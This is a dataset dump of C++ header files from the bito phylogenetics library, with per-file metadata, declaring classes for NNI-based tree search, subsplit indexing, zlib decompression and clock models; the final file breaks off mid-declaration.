id
int64
0
877k
file_name
stringlengths
3
109
file_path
stringlengths
13
185
content
stringlengths
31
9.38M
size
int64
31
9.38M
language
stringclasses
1 value
extension
stringclasses
11 values
total_lines
int64
1
340k
avg_line_length
float64
2.18
149k
max_line_length
int64
7
2.22M
alphanum_fraction
float64
0
1
repo_name
stringlengths
6
66
repo_stars
int64
94
47.3k
repo_forks
int64
0
12k
repo_open_issues
int64
0
3.4k
repo_license
stringclasses
11 values
repo_extraction_date
stringclasses
197 values
exact_duplicates_redpajama
bool
2 classes
near_duplicates_redpajama
bool
2 classes
exact_duplicates_githubcode
bool
2 classes
exact_duplicates_stackv2
bool
1 class
exact_duplicates_stackv1
bool
2 classes
near_duplicates_githubcode
bool
2 classes
near_duplicates_stackv1
bool
2 classes
near_duplicates_stackv2
bool
1 class
1,532,090
nni_engine.hpp
phylovi_bito/src/nni_engine.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // NNI Engine is used to explore the topological space surrounding the // subsplitDAG using NNI (Nearest Neighbor Interchange) moves. The engine functions by // finding all the NNIs adjacent to the DAG, scoring them, then choosing to accept or // reject each NNI based on a filtering criteria. For each NNI added to the DAG, each // new edge added also adds new adjacent NNIs to the DAG. This process is repeated // until no NNIs pass the filtering criteria. NNI scoring is facilitated by the // NNIEvalEngines. // // To understand this code, it may be easiest to start by reading RunMainLoop and then // branching out from there. #pragma once #include "gp_engine.hpp" #include "tp_engine.hpp" #include "gp_dag.hpp" #include "bitset.hpp" #include "subsplit_dag.hpp" #include "nni_operation.hpp" #include "graft_dag.hpp" #include "sugar.hpp" #include "gp_operation.hpp" #include "reindexer.hpp" #include "nni_evaluation_engine.hpp" #include "nni_engine_key_index.hpp" enum class NNIEvalEngineType { GPEvalEngine, TPEvalEngineViaLikelihood, TPEvalEngineViaParsimony }; static const inline size_t NNIEvalEngineTypeCount = 3; class NNIEvalEngineTypeEnum : public EnumWrapper<NNIEvalEngineType, size_t, NNIEvalEngineTypeCount, NNIEvalEngineType::GPEvalEngine, NNIEvalEngineType::TPEvalEngineViaParsimony> { public: static inline const std::string Prefix = "EvalEngineType"; static inline const Array<std::string> Labels = {{"GPEvalEngine", "TPEvalEngine"}}; static std::string ToString(const NNIEvalEngineType e) { std::stringstream ss; ss << Prefix << "::" << Labels[e]; return ss.str(); } friend std::ostream &operator<<(std::ostream &os, const NNIEvalEngineType e) { os << ToString(e); return os; } }; class NNIEngine { public: using NNIDoubleMap = std::map<NNIOperation, double>; using DoubleNNIPairSet = std::set<std::pair<double, NNIOperation>>; // Constructors NNIEngine(GPDAG &dag, std::optional<GPEngine *> gp_engine = std::nullopt, std::optional<TPEngine *> tp_engine = std::nullopt); // ** Access // Get Reference of DAG. GPDAG &GetDAG() { return dag_; }; const GPDAG &GetDAG() const { return dag_; }; // Get Reference of GraftDAG. GraftDAG &GetGraftDAG() { return *graft_dag_.get(); }; const GraftDAG &GetGraftDAG() const { return *graft_dag_.get(); }; // Get Reference of Evaluation Engine. NNIEvalEngine &GetEvalEngine() { Assert(HasEvalEngine(), "EvalEngine has not been set."); return *eval_engine_; } const NNIEvalEngine &GetEvalEngine() const { Assert(HasEvalEngine(), "EvalEngine has not been set."); return *eval_engine_; } bool HasEvalEngine() const { return eval_engine_ != nullptr; } // Get Reference of GPEvalEngine. NNIEvalEngineViaGP &GetGPEvalEngine() { Assert(HasGPEvalEngine(), "GPEvalEngine has not been set."); return *eval_engine_via_gp_.get(); } const NNIEvalEngineViaGP &GetGPEvalEngine() const { Assert(HasGPEvalEngine(), "GPEvalEngine has not been set."); return *eval_engine_via_gp_.get(); } bool HasGPEvalEngine() const { return eval_engine_via_gp_ != nullptr; } // Get Reference of TPEvalEngine. NNIEvalEngineViaTP &GetTPEvalEngine() { Assert(HasTPEvalEngine(), "TPEvalEngine has not been set."); return *eval_engine_via_tp_.get(); } const NNIEvalEngineViaTP &GetTPEvalEngine() const { Assert(HasTPEvalEngine(), "TPEvalEngine has not been set."); return *eval_engine_via_tp_.get(); } bool HasTPEvalEngine() const { return eval_engine_via_tp_ != nullptr; } // Get Reference of GPEngine. const GPEngine &GetGPEngine() const { Assert(HasGPEvalEngine(), "GPEvalEngine has not been set."); return GetGPEvalEngine().GetGPEngine(); } // Get Reference of TPEngine. const TPEngine &GetTPEngine() const { Assert(HasTPEvalEngine(), "TPEvalEngine has not been set."); return GetTPEvalEngine().GetTPEngine(); } // Get score for given NNI in or adjacent to DAG. double GetScoreByNNI(const NNIOperation &nni) const; double GetScoreByEdge(const EdgeId edge_id) const; // NNIs currently adjacent to DAG. const NNISet &GetAdjacentNNIs() const { return adjacent_nnis_; } size_t GetAdjacentNNICount() const { return adjacent_nnis_.size(); } // Adjacent NNIs that have been added in the current iteration. const NNISet &GetNewAdjacentNNIs() const { return new_adjacent_nnis_; } size_t GetNewAdjacentNNICount() const { return new_adjacent_nnis_.size(); } size_t GetOldNNICount() const { return adjacent_nnis_.size() - new_adjacent_nnis_.size(); } // NNIs that have been Accepted on current iteration. const NNISet &GetAcceptedNNIs() const { return accepted_nnis_; } size_t GetAcceptedNNICount() const { return GetAcceptedNNIs().size(); } // NNIs that have been Accepted from all iterations. const NNISet &GetPastAcceptedNNIs() const { return accepted_past_nnis_; } size_t GetPastAcceptedNNICount() const { return GetPastAcceptedNNIs().size(); } // Get NNIs that have been Rejected on current iteration. const NNISet &GetRejectedNNIs() const { return rejected_nnis_; } size_t GetRejectedNNICount() const { return GetRejectedNNIs().size(); } // Get NNIs that have been Rejected from all iterations. const NNISet &GetPastRejectedNNIs() const { return rejected_past_nnis_; } size_t GetPastRejectedNNICount() const { return GetPastRejectedNNIs().size(); } // Get Map of proposed NNIs with their score. const NNIDoubleMap &GetScoredNNIs() const { return scored_nnis_; } size_t GetScoredNNICount() const { return GetScoredNNIs().size(); } // Get Map of proposed NNIs with their score from all iterations. const NNIDoubleMap &GetPastScoredNNIs() const { return scored_past_nnis_; } size_t GetPastScoredNNICount() const { return GetPastScoredNNIs().size(); } // Get NNIs to rescore: marks adjacent NNIs which we want to recompute the // likelihood. This should just be new NNIs for TP (since future modifications // don't affect previous scores), but we want to rescore all adjacent NNIs for // GP (since old NNIs are affected by the state of the DAG). const NNISet &GetNNIsToRescore() const { return GetRescoreRejectedNNIs() ? GetAdjacentNNIs() : GetNewAdjacentNNIs(); } size_t GetNNIToRescoreCount() const { return GetNNIsToRescore().size(); } const NNIDoubleMap &GetScoredNNIsToRescore() const { return GetRescoreRejectedNNIs() ? scored_nnis_ : new_scored_nnis_; } const DoubleNNIPairSet &GetSortedScoredNNIsToRescore() const { return GetRescoreRejectedNNIs() ? sorted_scored_nnis_ : new_sorted_scored_nnis_; } // Returns NNIs we want to consider adding to the DAG. Depending on the option // chosen, this will either be strictly new adjacent NNIs or all adjacent NNIs // (including previously rejected NNIs) const NNISet &GetNNIsToReevaluate() const { return GetReevaluateRejectedNNIs() ? GetAdjacentNNIs() : GetNewAdjacentNNIs(); } size_t GetNNIsToReevaluateCount() const { return GetNNIsToReevaluate().size(); } const NNIDoubleMap &GetScoredNNIsToReevaluate() const { return GetReevaluateRejectedNNIs() ? scored_nnis_ : new_scored_nnis_; } const DoubleNNIPairSet &GetSortedScoredNNIsToReevaluate() const { return GetReevaluateRejectedNNIs() ? sorted_scored_nnis_ : new_sorted_scored_nnis_; } // Get vector of proposed NNI scores. DoubleVector GetNNIScores() const { DoubleVector scores; for (const auto &[nni, score] : GetScoredNNIs()) { std::ignore = nni; scores.push_back(score); } return scores; } // Get proposed NNI score. double GetNNIScore(const NNIOperation &nni) const { const auto it_1 = GetScoredNNIs().find(nni); if (it_1 != GetScoredNNIs().end()) { return it_1->second; } const auto it_2 = GetPastScoredNNIs().find(nni); if (it_2 != GetPastScoredNNIs().end()) { return it_2->second; } return -INFINITY; } // Reindexers for recent DAG modifications. const SubsplitDAG::ModificationResult &GetMods() const { return mods_; } const Reindexer &GetNodeReindexer() const { return mods_.node_reindexer; } const Reindexer &GetEdgeReindexer() const { return mods_.edge_reindexer; } // Option whether to re-evaluate rejected nnis. bool GetReevaluateRejectedNNIs() const { return reevaluate_rejected_nnis_; } void SetReevaluateRejectedNNIs(const bool reevaluate_rejected_nnis) { reevaluate_rejected_nnis_ = reevaluate_rejected_nnis; } // Option whether to re-score rejected nnis. bool GetRescoreRejectedNNIs() const { return rescore_rejected_nnis_; } void SetRescoreRejectedNNIs(const bool rescore_rejected_nnis) { rescore_rejected_nnis_ = rescore_rejected_nnis; } // Option whether to include NNIs at containing rootsplits. bool GetIncludeRootsplitNNIs() const { return include_rootsplit_nnis_; } void SetIncludeRootsplitNNIs(const bool include_rootsplit_nnis) { include_rootsplit_nnis_ = include_rootsplit_nnis; } // Get number of runs of NNI engine. size_t GetIterationCount() const { return iter_count_; }; // Reset number of iterations. void ResetIterationCount() { iter_count_ = 0; } // ** NNI Evaluation Engine // Set GP Engine. NNIEvalEngineViaGP &MakeGPEvalEngine(GPEngine *gp_engine); // Set TP Engine. NNIEvalEngineViaTP &MakeTPEvalEngine(TPEngine *tp_engine); // Check if evaluation engine is currently in use. bool IsEvalEngineInUse(const NNIEvalEngineType eval_engine_type) const { return eval_engine_in_use_[eval_engine_type]; } // Remove all evaluation engines from use. void ClearEvalEngineInUse(); // Set evaluation engine type for use in runner. void SelectEvalEngine(const NNIEvalEngineType eval_engine_type); // Set GP evaluation engine for use in runner. void SelectGPEvalEngine(); // Set TP likelihood evaluation engine for use in runner. void SelectTPLikelihoodEvalEngine(); // Set TP parsimony evaluation engine for use in runner. void SelectTPParsimonyEvalEngine(); // Initial GPEngine for use with GraftDAG. void InitEvalEngine(); // Populate PLVs for quick lookup of likelihoods. void PrepEvalEngine(); // Resize Engine for modified DAG. void GrowEvalEngineForDAG(std::optional<Reindexer> node_reindexer, std::optional<Reindexer> edge_reindexer); // Update PVs after modifying the DAG. void UpdateEvalEngineAfterModifyingDAG( const std::map<NNIOperation, NNIOperation> &pre_nni_to_nni, const size_t prev_node_count, const Reindexer &node_reindexer, const size_t prev_edge_count, const Reindexer &edge_reindexer); // Fetches Pre-NNI data to prep Post-NNI for likelihood computation. Method stores // intermediate values in the GPEngine temp space (expects GPEngine has already been // resized). void GrowEvalEngineForAdjacentNNIs(const bool via_reference = true, const bool use_unique_temps = false); // Get evaluation engine's branch length handler. const DAGBranchHandler &GetDAGBranchHandler() const; // Get branch lengths. const EigenVectorXd GetBranchLengths() const { return GetDAGBranchHandler().GetBranchLengths().GetDAGData(); } // ** Runners // These start the engine, which procedurally ranks and adds (and maybe removes) NNIs // to the DAG, until some termination criteria has been satisfied. // Primary Runner for NNI Engine. void Run(const bool is_quiet = true); // Initialization step run before loop. void RunInit(const bool is_quiet = true); // Step that finds adjacent NNIs, evaluates, then accepts or rejects them. void RunMainLoop(const bool is_quiet = true); // Step that runs at the end of each loop, preps for next loop. void RunPostLoop(const bool is_quiet = true); // ** Filter Functions // Function template for initialization step to be run on first iteration. using StaticFilterInitFunction = std::function<void(NNIEngine &)>; // Function template for update step to be run at beginning or end of each iteration. using StaticFilterUpdateFunction = std::function<void(NNIEngine &)>; // Function template for scoring to be performed on each adjacent NNI. using StaticFilterScoreLoopFunction = std::function<double(NNIEngine &, const NNIOperation &)>; // Function template for processing an adjacent NNI to be accepted or rejected. using StaticFilterEvaluateFunction = std::function<void(NNIEngine &, const NNISet &, const NNIDoubleMap &, const DoubleNNIPairSet &, NNISet &)>; using StaticFilterEvaluateLoopFunction = std::function<bool(NNIEngine &, const NNIOperation &, const double)>; // Function template for updating data structs after modifying DAG by adding // accepted NNIs. using StaticFilterModificationFunction = std::function<void(NNIEngine &, const SubsplitDAG::ModificationResult &, const std::map<NNIOperation, NNIOperation> &)>; // ** Filter Subroutines // Initialize filter before first iteration. void FilterInit(); // Update step before scoring NNIs void FilterPreScore(); // Scoring step assigns a score for each NNI. void FilterScoreAdjacentNNIs(); // Update step after scoring NNIs. void FilterPostScore(); // Filtering step which determines whether each NNI will accepted or rejected. void FilterEvaluateAdjacentNNIs(); // Update at end of each iteration (after modifying DAG by adding accepted NNIs). void FilterPostModification( const std::map<NNIOperation, NNIOperation> &nni_to_pre_nni); // Set filter initialization function. Called at the beginning of NNI engine run, // before main loop. void SetFilterInitFunction(StaticFilterInitFunction filter_init_fn); // Set filter pre-score update step. Performed once each iteration before scoring // NNIs. void SetFilterPreScoreFunction(StaticFilterUpdateFunction filter_pre_score_fn); // Set filter score step. Scoring step is performed on each proposed adjacent // NNI individually, and returns a score for that NNI. void SetFilterScoreLoopFunction(StaticFilterScoreLoopFunction filter_score_loop_fn); // Set filter post-score update step. Performed once each iteration after scoring // NNIs. void SetFilterPostScoreFunction(StaticFilterUpdateFunction filter_post_score_fn); // Set filter processing step. Processing step is performed on each proposed adjacent // NNI individually, taking in its NNI score and outputting a boolean whether to // accept or reject the NNI. void SetFilterEvaluateFunction(StaticFilterEvaluateFunction filter_evaluate_fn); void SetFilterEvaluateLoopFunction( StaticFilterEvaluateLoopFunction filter_evaluate_loop_fn); // Set filter post-iteration step. Performed once at the end of each iteration, after // adding accepted NNIs to DAG. void SetFilterPostModificationFunction( StaticFilterModificationFunction filter_post_modification_fn); // ** Filtering Schemes // Set filtering scheme to simply accept or reject all NNIs. void SetNoFilter(const bool accept_all_nnis); // Set filtering scheme to use GP likelihoods. void SetGPLikelihoodFilteringScheme(); // Set filtering scheme to use TP likelihoods. void SetTPLikelihoodFilteringScheme(); // Set filtering scheme to use TP parsimonies. void SetTPParsimonyFilteringScheme(); // Set filtering scheme to use GP likelihoods, using static cutoff. void SetGPLikelihoodCutoffFilteringScheme(const double score_cutoff); // Set filtering scheme to use TP likelihoods, using static cutoff. void SetTPLikelihoodCutoffFilteringScheme(const double score_cutoff); // Set filtering scheme to use TP parsimony, using static cutoff. void SetTPParsimonyCutoffFilteringScheme(const double score_cutoff); // Set filtering scheme to use GP likelihoods, using static cutoff. void SetGPLikelihoodDropFilteringScheme(const double score_cutoff); // Set filtering scheme to use TP likelihoods, using static cutoff. void SetTPLikelihoodDropFilteringScheme(const double score_cutoff); // Set filtering scheme to use TP parsimony, using static cutoff. void SetTPParsimonyDropFilteringScheme(const double score_cutoff); // Set filtering scheme to find the top K best-scoring NNIs. void SetTopKScoreFilteringScheme(const size_t k, const bool max_is_best = true); // ** Filtering Scheme Helper Functions // Set filter to score to constant value. void SetScoreToConstant(const double value = -INFINITY); // Set filter to score using evaluation engine. void SetScoreViaEvalEngine(); // Set filter to accept/deny all adjacent NNIs. void SetNoEvaluate(const bool set_all_nni_to_pass = true); // Set filter by accepting NNIs contained in explicit set. void SetEvaluateViaSetOfNNIs(const std::set<NNIOperation> &nnis_to_accept); // Set cutoff filter to constant cutoff. Accept scores above threshold. void SetEvaluateViaMinScoreCutoff(const double score_cutoff); // Set cutoff filter to constant cutoff. Accept scores below threshold. void SetEvaluateViaMaxScoreCutoff(const double score_cutoff); // Performs entire scoring computation for all Adjacent NNIs. void ScoreAdjacentNNIs(); // Get minimum score from scored NNIs. double GetMinScore() const; // Get maximum score from scored NNIs. double GetMaxScore() const; // Get bottom kth score from scored NNIs. double GetMinKScore(const size_t k) const; // Get top kth score from scored NNIs. double GetMaxKScore(const size_t k) const; // Get bottom kth score from scored NNIs. std::set<NNIOperation> GetMinKScoringNNIs(const size_t k) const; // Get top kth score from scored NNIs. std::set<NNIOperation> GetMaxKScoringNNIs(const size_t k) const; // ** Key Indexing using KeyIndex = NNIEngineKeyIndex; using KeyIndexPairArray = NNIEngineKeyIndexPairArray; using KeyIndexMap = NNIEngineKeyIndexMap; using KeyIndexMapPair = NNIEngineKeyIndexMapPair; // Translate NNIClade type to corresponding PHat PLV from KeyIndex type. using NNIClade = NNIOperation::NNIClade; static KeyIndex NNICladeToPHatPLV(NNIClade clade_type); // Builds an array containing a mapping of plvs from Pre-NNI to Post-NNI, according to // remapping of the NNI clades (sister, right_child, left_child). static KeyIndexPairArray BuildKeyIndexTypePairsFromPreNNIToPostNNI( const NNIOperation &pre_nni, const NNIOperation &post_nni); // Create map of key indices for given NNIOperation needed for computing NNI // Likelihoods. template <typename DAGType> static KeyIndexMap BuildKeyIndexMapForNNI(const NNIOperation &nni, const DAGType &dag, const size_t node_count); KeyIndexMap BuildKeyIndexMapForNNI(const NNIOperation &nni, const size_t node_count) const; // Create map of key indices for Post-NNI, using Pre-NNI map as a reference. template <typename DAGType> static KeyIndexMap BuildKeyIndexMapForPostNNIViaReferencePreNNI( const NNIOperation &pre_nni, const NNIOperation &post_nni, const KeyIndexMap &pre_key_idx, const DAGType &dag); KeyIndexMap BuildKeyIndexMapForPostNNIViaReferencePreNNI( const NNIOperation &pre_nni, const NNIOperation &post_nni, const KeyIndexMap &pre_key_idx) const; // ** DAG Maintenance // Add all Accepted NNIs to Main DAG. void AddAcceptedNNIsToDAG(const bool is_quiet = true); // Add all Adjacent NNIs to Graft DAG. void GraftAdjacentNNIsToDAG(const bool is_quiet = true); // Remove all NNIs from Graft DAG. void RemoveAllGraftedNNIsFromDAG(); // ** NNI Maintenance // These maintain NNIs to stay consistent with the state of associated GraftDAG. // Add score to given NNI. void AddNNIScore(const NNIOperation &nni, const double score); // Remove score for given NNI. void RemoveNNIScore(const NNIOperation &nni); // Freshly synchonizes NNISet to match the current state of its DAG. Wipes old NNI // data and finds all all parent/child pairs adjacent to DAG by iterating over all // internal edges in the DAG. (For each internal edges, two NNIs are possible.) void SyncAdjacentNNIsWithDAG(const bool on_init = false); // Updates NNI Set after given parent/child node pair have been added to the DAG. // Removes pair from NNI Set and adds adjacent pairs coming from newly created edges. void UpdateAdjacentNNIsAfterDAGAddNodePair(const NNIOperation &nni); void UpdateAdjacentNNIsAfterDAGAddNodePair(const Bitset &parent_bitset, const Bitset &child_bitset); // Adds all NNIs from all (node_id, other_id) pairs, where other_id's are elements of // the adjacent_node_ids vector. is_edge_leafward tells whether node_id is the child // or parent. is_edge_on_left determines which side of parent the child descends // from. void AddAllNNIsFromNodeVectorToAdjacentNNIs(const NodeId node_id, const SizeVector &adjacent_node_ids, const bool is_edge_on_left, const bool is_edge_leafward); // Based on given input NNIOperation, produces the two possible output NNIOperations // and adds those results to the NNI Set (if results are not a member of the DAG or // NNI Set). void SafeAddOutputNNIsToAdjacentNNIs(const Bitset &parent_bitset, const Bitset &child_bitset, const bool is_edge_on_left); // This handles updating all NNI data: adjacent, new, accepted, rejected, and scored // NNIs. void UpdateRejectedNNIs(); void UpdateAdjacentNNIs(); void UpdateScoredNNIs(); void UpdateAcceptedNNIs(); void UpdateOutOfDateAdjacentNNIs(); // Reset all NNIs, current and past. void ResetNNIData(); private: // ** Access // Get Reference of GP Engine. GPEngine &GetGPEngine() { Assert(HasGPEvalEngine(), "GPEvalEngine has not been set."); return GetGPEvalEngine().GetGPEngine(); } // Get Reference of TP Engine. TPEngine &GetTPEngine() { Assert(HasTPEvalEngine(), "TPEvalEngine has not been set."); return GetTPEvalEngine().GetTPEngine(); } // Un-owned reference DAG. GPDAG &dag_; // For adding temporary NNIs to DAG. std::unique_ptr<GraftDAG> graft_dag_; // Tracks modifications to the DAG. SubsplitDAG::ModificationResult mods_; // A map showing which Evaluation Engines are "in use". Several engines may be // instatiated, but may or may not be currently used for computation, and therefore // may not need to be upkept. NNIEvalEngineTypeEnum::Array<bool> eval_engine_in_use_; // Un-owned reference to NNI Evaluation Engine. Can be used to evaluate NNIs according // to Generalized Pruning, Likelihood, Parsimony, etc. Primary eval engine reference, // points to one of the available evaluation engines. NNIEvalEngine *eval_engine_ = nullptr; std::vector<NNIEvalEngine *> available_eval_engines_; // Evaluation engine for scoring NNIs using GP. std::unique_ptr<NNIEvalEngineViaGP> eval_engine_via_gp_ = nullptr; // Evaluation engine for scoring NNIs using TP. std::unique_ptr<NNIEvalEngineViaTP> eval_engine_via_tp_ = nullptr; // Set of NNIs to be evaluated, which are a single NNI. NNISet adjacent_nnis_; // Set of NNIs new to the current iteration. NNISet new_adjacent_nnis_; // NNIs which have passed the filtering threshold during current iteration, to be // added to the DAG. NNISet accepted_nnis_; // NNIs which have been accepted in a previous iteration of the search. NNISet accepted_past_nnis_; // NNIs which have failed the filtering threshold during current iteration, NOT to be // added to the DAG. NNISet rejected_nnis_; // NNIs which have been rejected in a previous iteration of the search. NNISet rejected_past_nnis_; // Map of adjacent NNIs to their score. NNIDoubleMap scored_nnis_; // Map of new NNIs to their score. NNIDoubleMap new_scored_nnis_; // Map of previous rejected NNIs to their score. NNIDoubleMap scored_past_nnis_; // Set of adjacent NNI scores, sorted by score. DoubleNNIPairSet sorted_scored_nnis_; // Set of new NNI scores, sorted by score. DoubleNNIPairSet new_sorted_scored_nnis_; // Steps of filtering scheme. StaticFilterInitFunction filter_init_fn_ = nullptr; StaticFilterUpdateFunction filter_pre_score_fn_ = nullptr; StaticFilterScoreLoopFunction filter_score_loop_fn_ = nullptr; StaticFilterUpdateFunction filter_post_score_fn_ = nullptr; StaticFilterEvaluateFunction filter_evaluate_fn_ = nullptr; StaticFilterEvaluateLoopFunction filter_evaluate_loop_fn_ = nullptr; StaticFilterModificationFunction filter_post_modification_fn_ = nullptr; // Count number of loops executed by engine. size_t iter_count_ = 0; // Count number of proposed NNIs computed. size_t proposed_nnis_computed_ = 0; // Whether to optimize branch lengths during optimization. bool optimize_on_init = true; // Whether to consider max or minimum scores as best. bool max_is_best = true; // Whether to re-evaluate rejected NNIs from previous iterations. bool reevaluate_rejected_nnis_ = true; // Whether to re-compute scores for rejected NNIs from previous iterations. bool rescore_rejected_nnis_ = false; // Whether to re-compute scores adjacent to newly added NNIs from previous iterations. bool rescore_old_nnis_adjacent_to_new_nnis_ = false; // Whether to include NNIs whose parent is a rootsplit. bool include_rootsplit_nnis_ = true; // Whether to save past iteration data. bool save_past_scored_nnis_ = false; bool save_past_accepted_nnis_ = true; bool save_past_rejected_nnis_ = true; bool track_rejected_nnis_ = false; };
25,977
C++
.h
519
45.795761
88
0.745079
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,091
psp_indexer.hpp
phylovi_bito/src/psp_indexer.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // This is a class implementing the an indexing scheme for the Primary Subsplit // Pair branch length parameterization. // See the 2019 ICLR paper for details, and the web documentation for a bit of // an introduction. // // We will use the first unused index ("first_empty_index") as a sentinel that // means "not present." This only happens on pendant branches, which do not have // a PSP component "below" the pendant branch. #pragma once #include <memory> #include <string> #include <unordered_map> #include <utility> #include <vector> #include "sbn_maps.hpp" #include "sugar.hpp" #include "unrooted_tree_collection.hpp" class PSPIndexer { public: PSPIndexer() : after_rootsplits_index_(0), first_empty_index_(0) {} PSPIndexer(BitsetVector rootsplits, BitsetSizeMap in_indexer); size_t AfterRootsplitsIndex() const { return after_rootsplits_index_; } size_t FirstEmptyIndex() const { return first_empty_index_; } // These are just some things that we may want to know about the indexer. StringSizeMap Details() const { return { // The first index after the rootsplits. {"after_rootsplits_index", after_rootsplits_index_}, // The first empty index, which is the number of entries. We will use // this value as a "sentinel" as described above. {"first_empty_index", first_empty_index_}, // This is the "official" definition of a PSP indexer representation of // a tree. It's a vector of vectors, where the order of entries of the // outer vector is laid out as follows. {"rootsplit_position", 0}, {"subsplit_down_position", 1}, {"subsplit_up_position", 2}, }; } // Reverse the indexer to a vector of strings. // We add in another extra empty string at the end for "no entry." StringVector ToStringVector() const; // Get the PSP representation of a given topology. SizeVectorVector RepresentationOf(const Node::NodePtr& topology) const; // Get the string version of the representation. // Inefficiently implemented, so for testing only. StringVectorVector StringRepresentationOf(const Node::NodePtr& topology) const; // Return a ragged vector of vectors such that the ith vector is the // collection of branch lengths in the tree collection for the ith split. DoubleVectorVector SplitLengths(const UnrootedTreeCollection& tree_collection) const; private: BitsetSizeMap indexer_; size_t after_rootsplits_index_; size_t first_empty_index_; }; #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("PSPIndexer") {} #endif // DOCTEST_LIBRARY_INCLUDED
2,712
C++
.h
61
41
87
0.738357
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,092
zlib_stream.hpp
phylovi_bito/src/zlib_stream.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // Interface to the zlib compression library #pragma once #include <zlib.h> #include <atomic> #include <memory> #include <sstream> #include <stdexcept> #include <streambuf> namespace zlib { // The result of an inflate operation. Contains the counts of consumed and // produced bytes. struct Result { enum class [[nodiscard]] Code : decltype(Z_OK){ ok = Z_OK, stream_end = Z_STREAM_END, need_dict = Z_NEED_DICT, }; Code code; size_t in_count; size_t out_count; }; // Thrown when zlib generates an error internally struct Exception : public std::runtime_error { enum class Code : decltype(Z_OK) { sys = Z_ERRNO, stream = Z_STREAM_ERROR, data = Z_DATA_ERROR, mem = Z_MEM_ERROR, buf = Z_BUF_ERROR, version = Z_VERSION_ERROR, }; Exception(Code c, const char* message) : std::runtime_error{message}, code{c} {} explicit Exception(Code c) : std::runtime_error{""}, code{c} {} const Code code; }; // Flush mode; see zlib documentation. We're only using partial for maximum // compatability. enum class Flush : decltype(Z_OK) { no = Z_NO_FLUSH, partial = Z_PARTIAL_FLUSH, sync = Z_SYNC_FLUSH, full = Z_FULL_FLUSH, finish = Z_FINISH, block = Z_BLOCK, trees = Z_TREES, }; namespace detail { // Wrapper for zlib calls. Will throw if unsuccessful constexpr Result::Code call_zlib(int zlib_code, const z_stream& impl); } // namespace detail // Wrapper around zlib inflate class ZStream { public: ZStream(); ~ZStream() noexcept; // Manually release the zlib resources, and throw if an error occurs. This // will be performed automatically by the destructor, with exceptions void Close(); // Performs a round of decompression. The result object contains // status code, count of consumed bytes and count of produced bytes Result Inflate(Flush mode, const unsigned char* in, size_t in_size, unsigned char* out, size_t out_size); private: ::z_stream impl_ = {}; std::atomic_flag closed_ = ATOMIC_FLAG_INIT; }; // IO streams interface for zlib. Performs buffering on both compressed and // decompressed sides. Takes input from a std::istream. class ZStringBuf : public std::stringbuf { using base = std::stringbuf; public: // Takes an input stream for compressed side, and buffer sizes for the // compressed and decompressed sides. ZStringBuf(const std::istream& in, size_t in_buf_size, size_t out_buf_size); virtual ~ZStringBuf() override; protected: virtual int_type underflow() override; virtual int_type uflow() override; virtual std::streamsize xsgetn(char_type* s, std::streamsize count) override; private: void ensure_avail(std::streamsize count); std::streambuf& in_; std::unique_ptr<char[]> in_buf_; const std::streamsize in_buf_size_; std::unique_ptr<char[]> out_buf_; const std::streamsize out_buf_size_; ZStream inflate_; }; } // namespace zlib
3,038
C++
.h
92
30.141304
82
0.719274
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,093
clock_model.hpp
phylovi_bito/src/clock_model.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <memory> #include <string> #include "block_model.hpp" #include "node.hpp" class ClockModel : public BlockModel { public: ClockModel(const BlockSpecification::ParamCounts& param_counts) : BlockModel(param_counts) {} virtual ~ClockModel() = default; virtual double GetRate(size_t node_id) = 0; static std::unique_ptr<ClockModel> OfSpecification(const std::string& specification); }; class NoClockModel : public ClockModel { public: explicit NoClockModel() : ClockModel({}) {} double GetRate(size_t node_id) override { return 1.; } void SetParameters(const EigenVectorXdRef parameters) override{}; }; class StrictClockModel : public ClockModel { public: explicit StrictClockModel(double rate) : ClockModel({{rate_key_, 1}}), rate_(rate) {} StrictClockModel() : StrictClockModel(1.0) {} double GetRate(size_t node_id) override { return rate_; } void SetParameters(const EigenVectorXdRef parameters) override; inline const static std::string rate_key_ = "clock_rate"; private: double rate_; };
1,184
C++
.h
31
35.548387
87
0.757469
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,094
rooted_sbn_instance.hpp
phylovi_bito/src/rooted_sbn_instance.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include "csv.hpp" #include "generic_sbn_instance.hpp" #include "phylo_flags.hpp" #include "rooted_gradient_transforms.hpp" #include "rooted_sbn_support.hpp" using PreRootedSBNInstance = GenericSBNInstance<RootedTreeCollection, RootedSBNSupport, RootedIndexerRepresentation>; template class GenericSBNInstance<RootedTreeCollection, RootedSBNSupport, RootedIndexerRepresentation>; class RootedSBNInstance : public PreRootedSBNInstance { public: using PreRootedSBNInstance::PreRootedSBNInstance; // ** SBN-related items // Turn an IndexerRepresentation into a string representation of the underlying // bitsets. This is really just so that we can make a test of indexer // representations. StringSet StringIndexerRepresentationOf( const RootedIndexerRepresentation& indexer_representation) const; StringSet StringIndexerRepresentationOf(const Node::NodePtr& topology, size_t out_of_sample_index) const; // Make a map from each subsplit to its overall probability when we sample a tree from // the SBN. BitsetDoubleMap UnconditionalSubsplitProbabilities() const; void UnconditionalSubsplitProbabilitiesToCSV(const std::string& csv_path) const; // ** Phylogenetic likelihood std::vector<double> LogLikelihoods( std::optional<PhyloFlags> external_flags = std::nullopt); template <class VectorType> std::vector<double> LogLikelihoods(const VectorType& flag_vec, const bool is_run_defaults); std::vector<double> UnrootedLogLikelihoods(); std::vector<double> LogDetJacobianHeightTransform(); std::vector<PhyloGradient> PhyloGradients( std::optional<PhyloFlags> external_flags = std::nullopt); template <class VectorType> std::vector<PhyloGradient> PhyloGradients(const VectorType& flag_vec, const bool is_run_defaults); std::vector<DoubleVector> GradientLogDeterminantJacobian(); // ** I/O void 